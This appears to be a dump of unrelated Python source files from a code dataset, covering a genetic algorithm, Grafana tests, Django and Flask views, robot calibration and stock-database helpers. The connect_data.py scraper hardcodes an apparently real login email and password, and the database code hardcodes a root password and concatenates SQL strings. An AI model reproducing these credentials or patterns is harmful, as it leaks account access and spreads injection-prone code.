random_rate = random.uniform(0.0, 1)\n child_1 = Individual(0)\n child_2 = Individual(0)\n switch = False\n\n if random_rate <= crossover_rate:\n points = random.sample(range(len(parent_1.genes)), points_number)\n if len(parent_1.genes) not in points:\n points.append(len(parent_1.genes))\n points.sort()\n last_point = 0\n for point in points:\n if switch:\n child_1.genes = np.append(child_1.genes,\n parent_1.genes[last_point:point])\n child_2.genes = np.append(child_2.genes,\n parent_2.genes[last_point:point])\n else:\n child_1.genes = np.append(child_1.genes,\n parent_2.genes[last_point:point])\n child_2.genes = np.append(child_2.genes,\n parent_1.genes[last_point:point])\n switch = not switch\n last_point = point\n else:\n child_1.genes = parent_1.genes\n child_2.genes = parent_2.genes\n offspring[recombination_index] = child_1\n offspring[recombination_index + 1] = child_2\n","sub_path":"project/source/genetic_algorithm/recombination.py","file_name":"recombination.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"117437535","text":"import requests_mock\r\nimport unittest\r\nfrom grafana_api.package.api.dashboard import Dashboard\r\nfrom config.config import Config\r\n\r\n\r\nclass DashboardTestCase(unittest.TestCase):\r\n def setUp(self):\r\n self.dashboard = Dashboard(\"test.api\", \"test.key\", \"account\", \"password\", \"http\")\r\n self.config = Config()\r\n\r\n @requests_mock.Mocker()\r\n def test_create_folder(self, m):\r\n expected_response = {\r\n \"id\": 31,\r\n \"uid\": \"NtnUR-IMz\",\r\n \"title\": \"test-folder\",\r\n \"url\": \"/dashboards/f/NtnUR-IMz/test-folder\",\r\n \"hasAcl\": False,\r\n \"canSave\": True,\r\n \"canEdit\": True,\r\n \"canAdmin\": True,\r\n \"version\": 1\r\n }\r\n m.post(\"http://test.api/api/folders\", json=expected_response)\r\n team_id = self.dashboard.create_folder(\"test-folder\")\r\n history = m.request_history\r\n self.assertEqual(history[0].json()[\"title\"], \"test-folder\") # 確認這個名稱有帶進去\r\n self.assertEqual(team_id, 31) # 確認是不是真有返回我們要的id\r\n\r\n @requests_mock.Mocker()\r\n def test_import_dashboard_from_a_file(self, m):\r\n expected_response = {\r\n \"id\": 33,\r\n \"slug\": \"node-exporter-full\",\r\n \"status\": \"success\",\r\n \"uid\": \"EEWy_Weiz\",\r\n \"url\": \"/d/EEWy_Weiz/node-exporter-full\",\r\n \"version\": 1\r\n }\r\n m.post(\"http://test.api/api/dashboards/db\", json=expected_response)\r\n response = self.dashboard.import_dashboard_from_a_file(\r\n self.config.DASHBOARD_FOLDER + \"/prod-devops/prod-devops-services.json\", 33,\r\n \"new-folder\")\r\n history = m.request_history\r\n self.assertEqual(history[0].json()[\"folderId\"], 33) # 看是不是真的把33這個id帶進去\r\n self.assertEqual(response.json()[\"status\"], \"success\")\r\n\r\n @requests_mock.Mocker()\r\n def test_get_all_folder_id(self, m):\r\n expected_response = [\r\n {\r\n \"id\": 32,\r\n \"uid\": \"FRMkz-IMk\",\r\n \"title\": \"new-folder\"\r\n },\r\n {\r\n \"id\": 34,\r\n \"uid\": \"VSJziaSGk\",\r\n \"title\": \"new-folder2\"\r\n }\r\n ]\r\n m.get(\"http://test.api/api/folders\", json=expected_response)\r\n response = self.dashboard.get_all_folder_id()\r\n self.assertEqual(len(response.json()), 2)\r\n\r\n @requests_mock.Mocker()\r\n def test_get_folder_id_by_name(self, m):\r\n expected_response = [\r\n {\r\n \"id\": 22,\r\n \"uid\": \"FRMkz-IMk\",\r\n \"title\": \"new-folder\"\r\n },\r\n {\r\n \"id\": 34,\r\n \"uid\": \"VSJziaSGk\",\r\n \"title\": \"new-folder2\"\r\n }\r\n ]\r\n m.get(\"http://test.api/api/folders\", json=expected_response)\r\n response = self.dashboard.get_folder_id_by_name(\"new-folder2\")\r\n self.assertEqual(response, 34)\r\n","sub_path":"test/api/test_dashboard.py","file_name":"test_dashboard.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"599080813","text":"'''\nCreated on 17-Oct-2017\n\n@author: Administrator\n'''\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\nimport requests\nfrom pyquery import PyQuery\nimport csv\nfrom time import gmtime, strftime\n\n\n\nusername = 'janevskidalibor@gmail.com'\npassword = 'NewLogin456'\n\n\n\n\n\n#creating a output file\nfile_export = open('connect_data_output'+'_'+strftime(\"%Y-%m-%d_%H-%M-%S\", gmtime())+'.csv', 'w', newline='')\nwr = csv.writer(file_export, quoting=csv.QUOTE_ALL)\nheaders = ['URL','Name', 'Website','Headquarters','Phone','Industries','Employees','Revenue','Ownership','Website']\nwr.writerow(headers)\ntarget_url = open('target_url.txt').read()\n\ntry:\n chromeOptions = webdriver.ChromeOptions()\n prefs = {\"profile.managed_default_content_settings.images\": 2}\n chromeOptions.add_experimental_option(\"prefs\", prefs)\n # chromeOptions.add_argument('headless')\n chromeOptions.add_argument('disable-gpu')\n driver = webdriver.Chrome('./chromedriver', chrome_options=chromeOptions)\nexcept Exception as e:\n print ('Failed to start chromedriver ' + str(e))\n exit()\n\ndef login_to_connect_data(driver):\n try:\n driver.get('https://connect.data.com/login?source=HPTopNav')\n driver.find_element_by_id('j_username').send_keys(username)\n driver.find_element_by_id('j_password').send_keys(password)\n driver.find_element_by_id('_spring_security_remember_me').click()\n driver.find_element_by_class_name('button-standard-text').click()\n except Exception as e:\n print ('Error in entering login information')\n \n try:\n element = WebDriverWait(driver, 30).until(EC.presence_of_element_located((By.CSS_SELECTOR, \".account-information .screenname\")))\n print (\"Login Successful\")\n except Exception as e:\n print ('Login failed - '+ str(e))\n\ndef get_all_links(driver):\n temp_links = []\n time.sleep(5)\n while True:\n \n all_links = driver.find_elements_by_css_selector('.name')\n for link in all_links:\n try:\n temp_links.append((link.find_element_by_css_selector('.companyName').get_attribute(\"href\"),link.find_element_by_css_selector('.website').text))\n except Exception as e:\n pass\n \n page_length_css = len(driver.find_elements_by_css_selector('.table-navigation-button-next.table-navigation-image.table-navigation-next-image'))\n if page_length_css == 4:\n break\n next_page = driver.find_elements_by_css_selector('.table-navigation-button-next.table-navigation-image.table-navigation-next-image-active')\n driver.execute_script(\"arguments[0].click();\", next_page[0])\n time.sleep(10)\n return temp_links\n\n \nlogin_to_connect_data(driver)\ndriver.get(target_url)\nresults_links = get_all_links(driver)\ndriver.quit()\n\ncount = 0\ntotal_results = str(len(results_links)) \nfor result in results_links:\n print ('Count : '+str(count)+'/'+total_results+'. Extracting - '+result[0])\n r = requests.get(result[0]).text\n pq = PyQuery(r)\n result_dataset = []\n result_dataset.append(str(result[0]))\n for data in pq('.seo-company-info tr td:nth-child(2)'):\n result_dataset.append(str(data.text).strip())\n result_dataset.append(str(result[1]))\n wr.writerow(result_dataset)\n count+=1\n\n","sub_path":"Dana_Lindahl/connect_data.py","file_name":"connect_data.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"300887632","text":"from flask import render_template, request, redirect, url_for, flash\n\nfrom shop import app, db\nfrom .models import Brand, Category\n\n@app.route(\"/addbrand\", methods=['GET', 'POST'])\ndef addbrand():\n if request.method == \"POST\":\n getbrand = request.form.get(\"brand\")\n brand = Brand(name=getbrand)\n db.session.add(brand)\n db.session.commit()\n flash(f'The Brand {getbrand} was added to your database', 'success')\n return redirect(url_for('addbrand'))\n return render_template(\"products/addbrand.html\", brands=\"brands\", title=\"Add Brand Page\")\n\n@app.route(\"/addcat\", methods=['GET', 'POST'])\ndef addcat():\n if request.method == \"POST\":\n getcat = request.form.get(\"category\")\n cat = Category(name=getcat)\n db.session.add(cat)\n db.session.commit()\n flash(f'The Category {getcat} was added to your database', 'success')\n return redirect(url_for('addbrand'))\n return render_template(\"products/addbrand.html\", brands=\"brands\", title=\"Add Brand Page\")\n","sub_path":"shop/products/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"16851613","text":"from collections import defaultdict\n\nfrom django import http\nfrom django.core import serializers\nimport django.utils.simplejson as json\nfrom django.views.generic import TemplateView\nfrom django.views.generic.list import BaseListView, ListView\n\nfrom HVZ.main.models import Building, Game, Player, School\nfrom HVZ.feed.models import Meal\n\n\nclass FullStatPage(TemplateView):\n template_name = 'stats/the_stats.html'\n\n def get_context_data(self, *args, **kwargs):\n context = super(FullStatPage, self).get_context_data(*args, **kwargs)\n\n return context\n\n\nclass MealLog(ListView):\n template_name = 'stats/meal_log.html'\n\n def get_queryset(self, *args, **kwargs):\n return Meal.objects.filter(eater__game=Game.nearest_game()).select_related(\n 'eater__user__first_name', 'eater__user__last_name',\n 'eaten__user__first_name', 'eaten__user__last_name').order_by('time')\n\n\nclass JSONResponseMixin(object):\n SERIALIZER = serializers\n FIELD_NAME = 'object_list'\n FIELDS = ()\n\n def render_to_response(self, context):\n \"Returns a JSON response containing 'context' as payload\"\n return self.get_json_response(self.convert_context_to_json(context))\n\n def get_json_response(self, content, **httpresponse_kwargs):\n \"Construct an `HttpResponse` object.\"\n return http.HttpResponse(content,\n content_type='application/json',\n **httpresponse_kwargs)\n\n def raw_serialization(self, context):\n raw_data = self.SERIALIZER.serialize(\n 'python',\n context[self.FIELD_NAME],\n fields=self.FIELDS,\n )\n\n return [d['fields'] for d in raw_data]\n\n def convert_context_to_json(self, context):\n \"Convert the context dictionary into a JSON object\"\n # Note: This is *EXTREMELY* naive; in reality, you'll need\n # to do much more complex handling to ensure that arbitrary\n # objects -- such as Django model instances or querysets\n # -- can be serialized as JSON.\n\n return json.dumps(self.raw_serialization(context))\n\n\nclass JSONPlayerStats(JSONResponseMixin, BaseListView):\n FIELDS = ('team', 'grad_year', 'school', 'dorm')\n # def get_context_data(self, *args, **kwargs):\n # context = super(JSONPlayerStats, self).get_context_data(*args, **kwargs)\n\n # context['objects'] = Player.objects.all().filter(game=Game.nearest_game()).values(\n # 'team',\n # 'grad_year',\n # 'school',\n # 'dorm',\n # )\n\n # return context\n def get_queryset(self):\n return Player.objects.all().filter(game=Game.nearest_game())\n\n def raw_serialization(self, context):\n actual = super(JSONPlayerStats, self).raw_serialization(context)\n\n aggregates = {\n 'grad_year': [\n {'label': 'zombies', 'data': defaultdict(int), 'color': 'rgb(0, 128, 0)'},\n {'label': 'humans', 'data': defaultdict(int), 'color': 'rgb(128,0,0)'},\n ],\n 'dorm': [\n {'label': 'zombies', 'data': defaultdict(int), 'color': 'rgb(0, 128, 0)'},\n {'label': 'humans', 'data': defaultdict(int), 'color': 'rgb(128,0,0)'},\n ],\n 'school': [\n {'label': 'zombies', 'data': defaultdict(int), 'color': 'rgb(0, 128, 0)'},\n {'label': 'humans', 'data': defaultdict(int), 'color': 'rgb(128,0,0)'},\n ],\n }\n\n dorms = Building.objects.filter(building_type=\"D\").order_by(\"name\").values('id', 'name')\n dorm_ordering = list(b['id'] for b in dorms)\n dorm_name_ordering = list(b['name'] for b in dorms)\n axis_lookup = {\n 'grad_year': {}, # 2013, etc.\n 'dorm': dict(enumerate(dorm_name_ordering)), # 0: Atwood Dorm, etc.\n 'school': {d['id']: d['name'] for d in School.objects.order_by('name').values('id', 'name')},\n }\n\n\n for item in actual:\n index = 0 if item['team'] == \"Z\" else 1\n\n if item['grad_year']:\n axis_lookup['grad_year'].setdefault(item['grad_year'], str(item['grad_year']))\n\n for key in aggregates:\n if item[key]:\n try:\n if key == 'dorm':\n aggregates[key][index]['data'][dorm_ordering.index(item[key])] += 1\n else:\n aggregates[key][index]['data'][item[key]] += 1\n except KeyError:\n continue\n\n aggregates['ticks'] = axis_lookup\n # convert all data dicts to arrays\n for key in aggregates:\n if key == \"ticks\":\n for tick_set in aggregates[key]:\n aggregates[key][tick_set] = [[int(_id), val] for _id, val in aggregates[key][tick_set].items()]\n continue\n for data_set in aggregates[key]:\n if key == 'dorm':\n # flip dorm data series for horizontal bars\n data_set['data'] = [[val, dkey] for dkey, val in data_set['data'].items()]\n else:\n data_set['data'] = [[dkey, val] for dkey, val in data_set['data'].items()]\n return aggregates\n","sub_path":"HVZ/HVZ/stats/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"260081063","text":"\"\"\"IAM Database queries that are not specific to either the Actions, ARNs, or Condition Keys tables.\"\"\"\nfrom sqlalchemy import and_\nfrom policy_sentry.shared.database import ActionTable\n\n\ndef get_all_actions(db_session, lowercase=False):\n \"\"\"\n Gets a huge list of all IAM actions. This is used as part of the policyuniverse approach to minimizing\n IAM Policies to meet AWS-mandated character limits on policies.\n\n :param db_session: SQLAlchemy database session object\n :param lowercase: Set to true to have the list of actions be in all lowercase strings.\n :return: A list of all actions present in the database.\n \"\"\"\n all_actions = set()\n rows = db_session.query(ActionTable.service, ActionTable.name).distinct(\n and_(ActionTable.service, ActionTable.name)\n )\n for row in rows:\n if lowercase:\n all_actions.add(str(row.service.lower() + \":\" + row.name.lower()))\n else:\n all_actions.add(str(row.service + \":\" + row.name))\n # Remove duplicates\n # all_actions = set(dict.fromkeys(all_actions))\n return all_actions\n\n\ndef get_all_service_prefixes(db_session):\n \"\"\"\n Gets all the AWS service prefixes from the actions table.\n\n If the action table does NOT have specific IAM actions (and therefore only supports * actions),\n then it will not be included in the response.\n\n :param db_session: The SQLAlchemy database session\n :return: A list of all AWS service prefixes present in the table.\n \"\"\"\n service_prefixes = []\n rows = db_session.query(ActionTable.service).distinct(ActionTable.service)\n for row in rows:\n if row.service not in service_prefixes:\n service_prefixes.append(row.service)\n # Remove duplicates\n service_prefixes = list(dict.fromkeys(service_prefixes)) # remove duplicates\n service_prefixes.sort()\n return service_prefixes\n","sub_path":"policy_sentry/querying/all.py","file_name":"all.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"451318318","text":"import logging\nfrom typing import (\n Dict, Awaitable, Callable, Any, Set, List, Optional,\n TYPE_CHECKING)\nfrom opentrons.types import Mount, Point, Location\nfrom opentrons.config import feature_flags as ff\nfrom opentrons.calibration_storage import modify\nfrom opentrons.hardware_control import ThreadManager, CriticalPoint\nfrom opentrons.protocol_api import labware\nfrom opentrons.protocols.geometry import deck\n\nimport robot_server.robot.calibration.util as uf\nfrom robot_server.service.errors import RobotServerError\nfrom robot_server.service.session.models.command import (\n CalibrationCommand, TipLengthCalibrationCommand)\nfrom robot_server.robot.calibration.constants import (\n TIP_RACK_LOOKUP_BY_MAX_VOL,\n SHORT_TRASH_DECK,\n STANDARD_DECK\n)\nfrom .state_machine import (\n TipCalibrationStateMachine\n)\nfrom .constants import (\n TipCalibrationState as State,\n TRASH_WELL,\n TIP_RACK_SLOT,\n CAL_BLOCK_SETUP_BY_MOUNT,\n MOVE_TO_TIP_RACK_SAFETY_BUFFER,\n MOVE_TO_REF_POINT_SAFETY_BUFFER,\n TRASH_REF_POINT_OFFSET\n)\nfrom ..errors import CalibrationError\nfrom ..helper_classes import (\n RequiredLabware,\n AttachedPipette\n)\n\nif TYPE_CHECKING:\n from opentrons_shared_data.labware import LabwareDefinition\n\n\nMODULE_LOG = logging.getLogger(__name__)\n\n\"\"\"\nA collection of functions that allow a consumer to prepare and update\ncalibration data associated with the combination of a pipette tip type and a\nunique (by serial number) physical pipette.\n\"\"\"\n\n# TODO: BC 2020-07-08: type all command logic here with actual Model type\nCOMMAND_HANDLER = Callable[..., Awaitable]\n\nCOMMAND_MAP = Dict[str, COMMAND_HANDLER]\n\n\nclass TipCalibrationUserFlow:\n def __init__(self,\n hardware: ThreadManager,\n mount: Mount,\n has_calibration_block: bool,\n tip_rack: 'LabwareDefinition'):\n self._hardware = hardware\n self._mount = mount\n self._has_calibration_block = has_calibration_block\n self._hw_pipette = self._hardware._attached_instruments[mount]\n if not self._hw_pipette:\n raise RobotServerError(\n definition=CalibrationError.NO_PIPETTE_ON_MOUNT,\n mount=mount)\n self._tip_origin_pt: Optional[Point] = None\n self._nozzle_height_at_reference: Optional[float] = None\n\n deck_load_name = SHORT_TRASH_DECK if ff.short_fixed_trash() \\\n else STANDARD_DECK\n self._deck = deck.Deck(load_name=deck_load_name)\n self._tip_rack = self._get_tip_rack_lw(tip_rack)\n self._initialize_deck()\n\n self._current_state = State.sessionStarted\n self._state_machine = TipCalibrationStateMachine()\n\n self._command_map: COMMAND_MAP = {\n CalibrationCommand.load_labware: self.load_labware,\n CalibrationCommand.jog: self.jog,\n CalibrationCommand.pick_up_tip: self.pick_up_tip,\n CalibrationCommand.invalidate_tip: self.invalidate_tip,\n CalibrationCommand.save_offset: self.save_offset,\n TipLengthCalibrationCommand.move_to_reference_point: self.move_to_reference_point, # noqa: E501\n CalibrationCommand.move_to_tip_rack: self.move_to_tip_rack, # noqa: E501\n CalibrationCommand.exit: self.exit_session,\n }\n\n def _set_current_state(self, to_state: State):\n self._current_state = to_state\n\n @property\n def current_state(self) -> State:\n return self._current_state\n\n def get_pipette(self) -> AttachedPipette:\n # TODO(mc, 2020-09-17): s/tip_length/tipLength\n return AttachedPipette( # type: ignore[call-arg]\n model=self._hw_pipette.model,\n name=self._hw_pipette.name,\n tip_length=self._hw_pipette.config.tip_length,\n mount=str(self._mount),\n serial=self._hw_pipette.pipette_id\n )\n\n def get_required_labware(self) -> List[RequiredLabware]:\n slots = self._deck.get_non_fixture_slots()\n lw_by_slot = {s: self._deck[s] for s in slots if self._deck[s]}\n return [\n RequiredLabware.from_lw(lw, s) # type: ignore\n for s, lw in lw_by_slot.items()]\n\n async def handle_command(self,\n name: Any,\n data: Dict[Any, Any]):\n \"\"\"\n Handle a client command\n\n :param name: Name of the command\n :param data: Data supplied in command\n :return: None\n \"\"\"\n next_state = self._state_machine.get_next_state(self._current_state,\n name)\n\n handler = self._command_map.get(name)\n if handler is not None:\n await handler(**data)\n self._set_current_state(next_state)\n MODULE_LOG.debug(f'TipCalUserFlow handled command {name}, transitioned'\n f'from {self._current_state} to {next_state}')\n\n async def load_labware(self):\n pass\n\n async def move_to_tip_rack(self):\n # point safely above target tip well in tip rack\n pt_above_well = self._tip_rack.wells()[0].top().point + \\\n MOVE_TO_TIP_RACK_SAFETY_BUFFER\n if self._tip_origin_pt is not None:\n # use jogged to x and y offsets only if returning tip to rack\n await self._move(Location(Point(self._tip_origin_pt.x,\n self._tip_origin_pt.y,\n pt_above_well.z),\n None))\n else:\n await self._move(Location(pt_above_well, None))\n\n async def move_to_reference_point(self):\n to_loc = self._get_reference_point()\n await self._move(to_loc)\n\n def _get_reference_point(self) -> Location:\n if self._has_calibration_block:\n slot = CAL_BLOCK_SETUP_BY_MOUNT[self._mount]['slot']\n well = CAL_BLOCK_SETUP_BY_MOUNT[self._mount]['well']\n calblock: labware.Labware = self._deck[slot] # type: ignore\n calblock_loc = calblock.wells_by_name()[well].top()\n return calblock_loc.move(point=MOVE_TO_REF_POINT_SAFETY_BUFFER)\n else:\n trash = self._deck.get_fixed_trash()\n assert trash\n trash_loc = trash.wells_by_name()[TRASH_WELL].top()\n return trash_loc.move(TRASH_REF_POINT_OFFSET +\n MOVE_TO_REF_POINT_SAFETY_BUFFER)\n\n async def save_offset(self):\n if self._current_state == State.measuringNozzleOffset:\n # critical point would default to nozzle for z height\n cur_pt = await self._get_current_point(\n critical_point=None)\n self._nozzle_height_at_reference = cur_pt.z\n elif self._current_state == State.measuringTipOffset:\n assert self._hw_pipette.has_tip\n assert self._nozzle_height_at_reference is not None\n # set critical point explicitly to nozzle\n cur_pt = await self._get_current_point(\n critical_point=CriticalPoint.NOZZLE)\n tip_length_offset = cur_pt.z - self._nozzle_height_at_reference\n\n # TODO: 07-22-2020 parent slot is not important when tracking\n # tip length data, hence the empty string, we should remove it\n # from create_tip_length_data in a refactor\n tip_length_data = modify.create_tip_length_data(\n self._tip_rack._definition, '',\n tip_length_offset)\n modify.save_tip_length_calibration(self._hw_pipette.pipette_id,\n tip_length_data)\n\n def _get_default_tip_length(self) -> float:\n tiprack: labware.Labware = self._deck[TIP_RACK_SLOT] # type: ignore\n full_length = tiprack.tip_length\n overlap_dict: Dict = \\\n self._hw_pipette.config.tip_overlap\n default = overlap_dict['default']\n overlap = overlap_dict.get(tiprack.uri, default)\n return full_length - overlap\n\n def _get_critical_point_override(self) -> Optional[CriticalPoint]:\n return (CriticalPoint.FRONT_NOZZLE if\n self._hw_pipette.config.channels == 8 else None)\n\n async def _get_current_point(\n self,\n critical_point: CriticalPoint = None) -> Point:\n return await self._hardware.gantry_position(self._mount,\n critical_point)\n\n async def jog(self, vector):\n await self._hardware.move_rel(mount=self._mount,\n delta=Point(*vector))\n\n async def pick_up_tip(self):\n await uf.pick_up_tip(self, tip_length=self._get_default_tip_length())\n\n async def invalidate_tip(self):\n await uf.invalidate_tip(self)\n\n async def exit_session(self):\n await self.move_to_tip_rack()\n await self._return_tip()\n\n def _get_tip_rack_lw(self,\n tip_rack_def: 'LabwareDefinition') -> labware.Labware:\n try:\n return labware.load_from_definition(\n tip_rack_def,\n self._deck.position_for(TIP_RACK_SLOT))\n except Exception:\n raise RobotServerError(definition=CalibrationError.BAD_LABWARE_DEF)\n\n def _get_alt_tip_racks(self) -> Set[str]:\n pip_vol = self._hw_pipette.config.max_volume\n return set(TIP_RACK_LOOKUP_BY_MAX_VOL[str(pip_vol)].alternatives)\n\n def _initialize_deck(self):\n self._deck[TIP_RACK_SLOT] = self._tip_rack\n\n if self._has_calibration_block:\n cb_setup = CAL_BLOCK_SETUP_BY_MOUNT[self._mount]\n self._deck[cb_setup['slot']] = labware.load(\n cb_setup['load_name'],\n self._deck.position_for(cb_setup['slot']))\n\n async def _return_tip(self):\n await uf.return_tip(self, tip_length=self._get_default_tip_length())\n\n async def _move(self, to_loc: Location):\n await uf.move(self, to_loc)\n","sub_path":"robot-server/robot_server/robot/calibration/tip_length/user_flow.py","file_name":"user_flow.py","file_ext":"py","file_size_in_byte":9986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"126693346","text":"from socket import SocketIO\n\nfrom flask import jsonify\nfrom jsonpickle import json\n\nfrom project.domain_layer.users_managment.UsersManager import UsersManager\n\n\nclass Publisher:\n def __init__(self, sio: SocketIO):\n self.users_manager = None\n self.sio = sio\n\n def set_users_manager(self, users_manager: UsersManager):\n self.users_manager = users_manager\n\n def notify(self, message, user):\n print('publisher message: ' + message)\n if self.users_manager.check_if_loggedin(user):\n self.send_notification(user, message)\n else:\n self.users_manager.add_notification(user, message)\n\n def send_notification(self, username, message):\n self.sio.send({\n 'messages': [message]\n }, room=username)\n\n def store_status_update(self, store_id, store_name, users: [str], status=''):\n \"\"\"\n send \"store closes/reopens\" event notification message\n :param status: open/close.\n :param store_id:\n :param store_name:\n :param users: list of recipients (user names)\n :return:\n \"\"\"\n open_message = \"Dear {}, \" \\\n 'we are glad to inform your store: {} is now open!'\n close_message = 'Dear {}, ' \\\n 'your store: {} has been closed.'\n for owner in users:\n if status == 'open':\n message = open_message\n else:\n message = close_message\n notification = message.format(owner, store_name)\n self.notify(notification, owner)\n\n # store owner get notification when their appointment as store owner was removed\n def store_ownership_update(self, store_id, store_name, users: [str]):\n \"\"\"\n send \"store owner appointment\" event notification message\n :param store_id:\n :param store_name:\n :param users: list of recipients (user names)\n :return:\n \"\"\"\n message = 'Dear {}, ' \\\n 'your store owner appointment of store: {} was removed and is no longer valid.'\n for owner in users:\n notification = message.format(owner, store_name)\n self.notify(notification, owner)\n\n # store owner get notification when a client buys a product from the store\n def purchase_update(self, store_id, store_name, users: [str]):\n \"\"\"\n send \"new purchase\" event notification message\n :param store_id:\n :param store_name:\n :param users: list of recipients (user names)\n :return:\n \"\"\"\n message = 'Dear {}, ' \\\n 'We are glad to inform that an item from your store: {} has been purchased. ' \\\n 'For more information, please check out purchase history.'\n for owner in users:\n notification = message.format(owner, store_name)\n self.notify(notification, owner)\n","sub_path":"project/domain_layer/communication_managment/Publisher.py","file_name":"Publisher.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"57392299","text":"__author__ = 'qbinghe'\n\n# NOTE: We will do this when MySql official connector supports python 3\n# Then we will replace sql.write_frame with sql.to_sql\n# from sqlalchemy import create_engine\n# engine = create_engine('mysql://root:1234@127.0.0.1/stock_database')\n\nimport mysql.connector\nimport globalData as gData\nimport pandas as pd\nimport warnings\nimport helper as myHelper\nimport re\nfrom pandas.io import sql\n\n# Trade data info\n# tradeData_daily_TB = 'trade_data_daily'\n# tradeData_weekly_TB = 'trade_data_weekly'\n# tradeData_monthly_TB = 'trade_data_monthly'\n# tradeData_yearly_TB = 'trade_data_yearly'\n#\n# dataType_dataTable_mapping = {\n# gData.DataType.daily : dict(zip(['dbTableName', 'dbOrderBy', 'dbDateColumn'], [tradeData_daily_TB, 'date', 'date'])),\n# gData.DataType.weekly : dict(zip(['dbTableName', 'dbOrderBy', 'dbDateColumn'], [tradeData_weekly_TB, 'week', 'week']))\n# }\n\n# ======== DATABASE ==========\n# Database file name ends with _DB\n# Database table name ends with _TB\n# Database view name ends with _VW\n# Database column name starts with col_[ONE_CAPITAL_LETTER_HERE]...\n\n# We have two data:\n# 000. Complete data contains all the following data (complete_data)\n# 1. Trade data (Trade_data)\n# 2. TA data (indicator_data)\n#\n# All these data contains information _daily, _weekly, and _monthly\ndatabasePath = 'db/'\ninit_script = databasePath + 'initDatabse.sql'\ntmp_init_script = databasePath + 'initDatabse.tmp.sql'\n\nstock_database = 'stock_database'\n\n# Stock info\nstockSymbol_TB = 'stock_symbol' # contains symbol and full name of the stock\n\n\n\ndef dbFetchStockInfo():\n sql_str = 'SELECT * FROM ' + stockSymbol_TB\n gData.allStockDF = dbSelectOperation(sql_str)\n\n# Update init script from www.vertabelo.com\ndef updateInitSQLScript():\n try:\n myHelper.debugDB(\"Updating init SQL script...\")\n finalScriptFile = open(tmp_init_script, 'w')\n with open(init_script, 'r') as scriptFile:\n content = scriptFile.readlines()\n for line in content:\n newLine = line\n\n # MySQL sucks with creating index so drop it. We care only about PK anyways\n m = re.match('(CREATE INDEX)(.*)', newLine)\n if m: continue\n\n m1 = re.match('(CREATE (TABLE|VIEW))(.*)', newLine)\n if m1: newLine = m1.groups()[0] + ' IF NOT EXISTS' + m1.groups()[2] + ' \\n'\n\n finalScriptFile.write(newLine)\n return finalScriptFile\n except Exception as e:\n myHelper.debugDB(\"Error while updating init SQL script:\")\n myHelper.debugDB(e)\n finally:\n if scriptFile is not None: scriptFile.close()\n if finalScriptFile is not None: finalScriptFile.close()\n\n# Modeling is done on www.vertabelo.com. Use the generated SQL script to init database in MySQL\ndef initDatabaseFromScript():\n updateInitSQLScript()\n try:\n myHelper.debugDB(\"Running init SQL script...\")\n cnx = getMySQLConnection(noDB = True)\n cursor = cnx.cursor()\n # Make sure the database exists\n cursor.execute('CREATE DATABASE IF NOT EXISTS ' + stock_database)\n cnx.commit()\n\n cnx.database = stock_database\n tmpScript = open(tmp_init_script, 'r') # tmp_init_script updated in updateInitSQLScript()\n results = cursor.execute(tmpScript.read(), multi=True)\n for dummy_cur in results: pass # Have to loop through all results to execute statements, DUMB!\n cnx.commit()\n tmpScript.close()\n myHelper.debugDB(\"Changes successfully committed\")\n except Exception as e:\n myHelper.debugDB(\"Something went wrong during initializing database:\")\n myHelper.debugDB(e)\n finally:\n myHelper.debugDB(\"Closing DB\")\n # Test if they exist\n if cursor is not None: cursor.close()\n if cnx is not None: cnx.close()\n if tmpScript is not None: tmpScript.close()\n\n\n\ndef insertData(dbTableName, dbDateColumn, df):\n _insertData(df, dbTableName)\n\ndef insertInfoData(df):\n _insertData(df, stockSymbol_TB)\n\ndef _insertData(df, tableName):\n conn = getMySQLConnection()\n # sql.to_sql(df, name=tablename, con=conn, if_exists='append', index=False)\n suppressWriteFrameWarning()\n sql.write_frame(frame= df, name=tableName, con=conn, flavor='mysql', if_exists='append', index=False)\n\n\ndef dbGetDataByOmxid(omxid, tableName, orderBy):\n sql_str = 'SELECT * FROM ' + tableName + ' where omxid = \\'' + omxid + '\\' ORDER BY ' + orderBy + ' ASC'\n return dbSelectOperation(sql_str)\n\ndef deleteData(dbTableName, dbDateColumn, df):\n # DELETE FROM table WHERE (col1,col2) IN ((1,2),(3,4),(5,6))\n keyStr = myHelper.generateKeyDateList(df[ ['omxid', dbDateColumn]].values.tolist())\n sqlStr = 'DELETE FROM ' + dbTableName + ' WHERE (omxid, ' + dbDateColumn + ') IN (' + ','.join(keyStr) + ')'\n dbDeleteOperation(sqlStr)\n\n\n###########################\n### Database helper\n###########################\ndef dbSelectOperation(sqlStr):\n conn = getMySQLConnection()\n myHelper.debugDB(sqlStr)\n df = pd.read_sql(sqlStr, conn)\n conn.close()\n return df\n\ndef dbDeleteOperation(sqlStr):\n dbExecuteSQLStatement(sqlStr)\n\ndef dbExecuteSQLStatement(sqlStr):\n conn = getMySQLConnection()\n myHelper.debugDB(sqlStr)\n cursor = conn.cursor()\n cursor.execute(sqlStr)\n conn.commit()\n\ndef getMySQLConnection(noDB = False):\n if noDB:\n conn = mysql.connector.connect(user='root', password='1234', host='127.0.0.1')\n else:\n conn = mysql.connector.connect(user='root', password='1234', host='127.0.0.1', database=stock_database)\n\n class My_SQLConverter(mysql.connector.conversion.MySQLConverter):\n def _DATE_to_python(self, value, dsc=None):\n # Raw value is byte array, need to decode\n return value.decode(\"utf-8\")\n #_NEWDATE_to_python 